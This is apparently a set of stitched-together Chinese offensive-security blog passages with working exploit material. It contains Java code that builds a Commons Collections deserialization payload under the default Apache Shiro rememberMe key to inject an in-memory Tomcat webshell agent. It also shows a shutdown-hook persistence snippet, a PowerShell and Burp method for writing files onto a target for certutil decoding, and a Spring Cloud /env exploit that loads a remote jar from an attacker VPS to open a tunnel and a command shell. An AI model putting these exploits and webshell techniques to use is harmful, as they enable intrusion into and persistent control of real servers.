                        "Object o = invoke.get(i);n" +
                        "                java.lang.reflect.Method displayName = o.getClass().getSuperclass().getDeclaredMethod("displayName", null);n" +
                        "                Object name = displayName.invoke(o, null);n" +
                        "if (name.toString().contains("org.apache.catalina.startup.Bootstrap")) {" +
                        "                    java.lang.reflect.Method attach = MyVirtualMachine.getDeclaredMethod("attach", new Class[]{MyVirtualMachineDescriptor});n" +
                        "                    Object machine = attach.invoke(MyVirtualMachine, new Object[]{o});n" +
                        "                    java.lang.reflect.Method loadAgent = machine.getClass().getSuperclass().getSuperclass().getDeclaredMethod("loadAgent", new Class[]{String.class});n" +
                        "                    loadAgent.invoke(machine, new Object[]{"%s"});n" +
                        "                    java.lang.reflect.Method detach = MyVirtualMachine.getDeclaredMethod("detach", null);n" +
                        "                    detach.invoke(machine, null);n" +
                        "                    break;n" +
                        "}" +
                        "}" +
                        "} catch (Exception e) {n" +
                        "            e.printStackTrace();n" +
                        "        }"
                , agentPath.replaceAll("\\", "\\\\").replaceAll(""", "\""));

        clazz.makeClassInitializer().insertAfter(cmd);
        clazz.setName("ysoserial.Pwner" + System.nanoTime());
        CtClass superC = pool.get(abstTranslet.getName());
        clazz.setSuperclass(superC);
        byte[] classBytes = clazz.toBytecode();
        Reflections.setFieldValue(templates, "_bytecodes", new byte[][]{classBytes, classAsBytes(Foo.class)});
        Reflections.setFieldValue(templates, "_name", "Pwnr");
        Reflections.setFieldValue(templates, "_tfactory", transFactory.newInstance());
        return templates;
    }

    public static String classAsFile(Class<?> clazz) {
        return classAsFile(clazz, true);
    }

    public static String classAsFile(Class<?> clazz, boolean suffix) {
        String str;
        if (clazz.getEnclosingClass() == null) {
            str = clazz.getName().replace(".", "/");
        } else {
            str = classAsFile(clazz.getEnclosingClass(), false) + "$" + clazz.getSimpleName();
        }

        if (suffix) {
            str = str + ".class";
        }

        return str;
    }

    public static byte[] classAsBytes(Class<?> clazz) {
        try {
            byte[] buffer = new byte[1024];
            String file = classAsFile(clazz);
            InputStream in = CC10.class.getClassLoader().getResourceAsStream(file);
            if (in == null) {
                throw new IOException("couldn't find '" + file + "'");
            } else {
                ByteArrayOutputStream out = new ByteArrayOutputStream();

                int len;
                while ((len = in.read(buffer)) != -1) {
                    out.write(buffer, 0, len);
                }

                return out.toByteArray();
            }
        } catch (IOException var6) {
            throw new RuntimeException(var6);
        }
    }


    public static void main(String[] args) throws Exception {
        // this is your agent path
        String command = "E:\code\java\MyAgent\out\artifacts\MyAgent_jar\MyAgent.jar";
        Object templates = createTemplatesImpl(command);
        InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
        Map innerMap = new HashMap();
        Map lazyMap = LazyMap.decorate(innerMap, transformer);
        TiedMapEntry entry = new TiedMapEntry(lazyMap, templates);
        HashSet map = new HashSet(1);
        map.add("foo");
        Field f = null;

        try {
            f = HashSet.class.getDeclaredField("map");
        } catch (NoSuchFieldException var17) {
            f = HashSet.class.getDeclaredField("backingMap");
        }

        Reflections.setAccessible(f);
        HashMap innimpl = null;
        innimpl = (HashMap) f.get(map);
        Field f2 = null;

        try {
            f2 = HashMap.class.getDeclaredField("table");
        } catch (NoSuchFieldException var16) {
            f2 = HashMap.class.getDeclaredField("elementData");
        }

        Reflections.setAccessible(f2);
        Object[] array = new Object[0];
        array = (Object[]) ((Object[]) f2.get(innimpl));
        Object node = array[0];
        if (node == null) {
            node = array[1];
        }

        Field keyField = null;

        try {
            keyField = node.getClass().getDeclaredField("key");
        } catch (Exception var15) {
            keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
        }

        Reflections.setAccessible(keyField);
        keyField.set(node, entry);
        Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");

        byte[] bytes = Serializables.serializeToBytes(map);
        String key = "kPH+bIxk5D2deZiIxcaaaA==";
        String rememberMe = EncryptUtil.shiroEncrypt(key, bytes);
        System.out.println(rememberMe);
    }

    public static class Foo implements Serializable {
        private static final long serialVersionUID = 8207363842866235160L;

        public Foo() {
        }
    }

    public static class StubTransletPayload extends AbstractTranslet implements Serializable {
        private static final long serialVersionUID = -5971610431559700674L;

        public StubTransletPayload() {
        }

        public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
        }

        public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
        }
    }


}

class Serializables {
    public static byte[] serializeToBytes(final Object obj) throws Exception {
        final ByteArrayOutputStream out = new ByteArrayOutputStream();
        final ObjectOutputStream objOut = new ObjectOutputStream(out);
        objOut.writeObject(obj);
        objOut.flush();
        objOut.close();
        return out.toByteArray();
    }


    public static Object deserializeFromBytes(final byte[] serialized) throws Exception {
        final ByteArrayInputStream in = new ByteArrayInputStream(serialized);
        final ObjectInputStream objIn = new ObjectInputStream(in);
        return objIn.readObject();
    }

    public static void serializeToFile(String path, Object obj) throws Exception {
        FileOutputStream fos = new FileOutputStream("object");
        ObjectOutputStream os = new ObjectOutputStream(fos);
        //writeObject()方法将obj对象写入object文件
        os.writeObject(obj);
        os.close();
    }

    public static Object serializeFromFile(String path) throws Exception {
        FileInputStream fis = new FileInputStream(path);
        ObjectInputStream ois = new ObjectInputStream(fis);
        // 通过Object的readObject()恢复对象
        Object obj = ois.readObject();
        ois.close();
        return obj;
    }

}


class EncryptUtil {
    private static final String ENCRY_ALGORITHM = "AES";
    private static final String CIPHER_MODE = "AES/CBC/PKCS5Padding";
    private static final byte[] IV = "aaaaaaaaaaaaaaaa".getBytes();     // 16字节IV

    public EncryptUtil() {
    }

    public static byte[] encrypt(byte[] clearTextBytes, byte[] pwdBytes) {
        try {
            SecretKeySpec keySpec = new SecretKeySpec(pwdBytes, ENCRY_ALGORITHM);
            Cipher cipher = Cipher.getInstance(CIPHER_MODE);
            IvParameterSpec iv = new IvParameterSpec(IV);
            cipher.init(1, keySpec, iv);
            byte[] cipherTextBytes = cipher.doFinal(clearTextBytes);
            return cipherTextBytes;
        } catch (NoSuchPaddingException var6) {
            var6.printStackTrace();
        } catch (NoSuchAlgorithmException var7) {
            var7.printStackTrace();
        } catch (BadPaddingException var8) {
            var8.printStackTrace();
        } catch (IllegalBlockSizeException var9) {
            var9.printStackTrace();
        } catch (InvalidKeyException var10) {
            var10.printStackTrace();
        } catch (Exception var11) {
            var11.printStackTrace();
        }

        return null;
    }

    public static String shiroEncrypt(String key, byte[] objectBytes) {
        byte[] pwd = Base64.decode(key);
        byte[] cipher = encrypt(objectBytes, pwd);

        assert cipher != null;

        byte[] output = new byte[pwd.length + cipher.length];
        byte[] iv = IV;
        System.arraycopy(iv, 0, output, 0, iv.length);
        System.arraycopy(cipher, 0, output, pwd.length, cipher.length);
        return Base64.encode(output);
    }
}

在javassist插桩的时候碰到很多坑，比如泛型要用/**/包起来，反射的可变参数的处理等等，不一一细讲，参考我的代码就行了。

效果

项目地址：https://github.com/Y4er/javaagent-tomcat-memshell

思考

写到这里又看了一些文章，发现了一些问题。

内存shell复活

@rebeyond 师傅的memShell项目实现了内存shell复活，原理是通过设置Java虚拟机的关闭钩子ShutdownHook来达到这个目的，但是会有一个jar包循环等待jvm进程起来，更敏感，我就没实现这个东西，代码贴出来

public static void persist() {
     try {
         Thread t = new Thread() {
             public void run() {
                 try {
                     writeFiles("inject.jar",Agent.injectFileBytes);
                     writeFiles("agent.jar",Agent.agentFileBytes);
                     startInject();
                 } catch (Exception e) {

                 }
             }
         };
         t.setName("shutdown Thread");
         Runtime.getRuntime().addShutdownHook(t);
     } catch (Throwable t) {
     }
}

JVM关闭前，会先调用writeFiles把inject.jar和agent.jar写到磁盘上，然后调用startInject，startInject通过Runtime.exec启动java -jar inject.jar。

文件落地并且被锁定

用javaagent的形式实现的内存shell，你需要落地一个agent进去，加载agent之后jar不能被删除，而落地agent会不会更敏感？

与其落地文件为什么不直接落地jsp shell，获取对于mvc和springboot这种有点作用，但是内存shell的意义确实被削弱了。

通用性

只需要寻找关键类即可，对于tomcat、weblogic这种还算通用，完全可以实现一个agent.jar通杀。

关键类寻找

如果关键类找不对，或者错了几个参数的命名，那么中间件正常处理filter的逻辑很可能发生错误，中间件很可能被打挂。虽然可以本地环境调试，但是每个发行版不同、补丁数的不同所带来的不稳定因素还是很大的。

结论

所以个人而言，agent类型的内存shell只能作为内存shell的一种开拓性思路，实际环境更应该倾向于servlet、filter这种内存shell，重在稳定。

参考

1. https://www.cnblogs.com/rebeyond/p/9686213.html
2. https://github.com/rebeyond/memShell
3. https://www.cnblogs.com/rickiyang/p/11368932.html
4. https://github.com/Y4er/javaagent-tomcat-memshell

而在使用certutil base64通过echo写文件时，echo会在每行的末尾追加一个空格，加上http传输的URL编码问题，有一些傻逼环境总是decode时候出错，而且一些几十几百k的文件，一行一行echo实在是拉跨。所以用powershell配合bp的爆破模块来写文件，然后 certutil -decode 就完事了，轻松省心。

powershell -c "'a' | Out-File C:\1.txt -Append"

写文件的时候通过bp的爆破模块去单线程写入文件，举一个请求包的例子。

/login HTTP/1.1
Host: baidu.com

cmd=powershell -c "'§§' | Out-File C:\1.txt -Append"

设置参数

设置certutil encode的txt字典

勾上URL编码

设置单线程，你也可以设置每次请求之后sleep 1秒。

冲完之后落地到目标的txt文件和本地的txt文件hash一致，decode之后的文件hash仍然一致。

本地还原文件的hash

落地到目标还原之后的文件hash

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

https://github.com/Y4er/yaml-payload

README

利用条件：
– 可以 POST 请求目标网站的 /env 接口设置属性
– 可以 POST 请求目标网站的 /refresh 接口刷新配置（存在 spring-boot-starter-actuator 依赖）
– 目标依赖的 spring-cloud-starter 版本 < 1.3.0.RELEASE
– 目标可以请求攻击者的 HTTP 服务器（请求可出外网）

仅在JDK1.8及Spring1.x测试通过,其他版本自测.

利用方法如下：

编译class文件然后打jar包

cd yaml-payload
javac src/artsploit/AwesomeScriptEngineFactory.java -cp ./lib
javac src/artsploit/Tunnel.java -cp ./lib
javac src/artsploit/GameInfo.java -cp ./lib
jar -cvf yaml-payload.jar -C src/ .

托管 yml 和 jar 文件

在自己控制的vps机器上开启一个简单HTTP服务器，端口尽量使用常见HTTP服务端口（80、443）

# 使用 python 快速开启 http server
python2 -m SimpleHTTPServer 80
python3 -m http.server 80

在网站根目录下放置后缀为yml的文件yaml-payload.yml,内容如下:

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://your-vps-ip/yaml-payload.jar"]
  ]]
]

在网站根目录下放置打包好的yaml-payload.jar

设置spring.cloud.bootstrap.location属性

POST /env
Content-Type: application/x-www-form-urlencoded

spring.cloud.bootstrap.location=http://your-vps-ip/yaml-payload.yml

刷新配置

POST /refresh
Content-Type: application/x-www-form-urlencoded

访问注入的shell

1. reGeorg: http://localhost:9092/api/v1/tunnel
2. cmd shell: http://localhost:9092/api/v1/game POST:code=whoami

参考

1. https://github.com/LandGrey/SpringBootVulExploit
2. https://www.anquanke.com/post/id/198886
3. https://github.com/artsploit/yaml-payload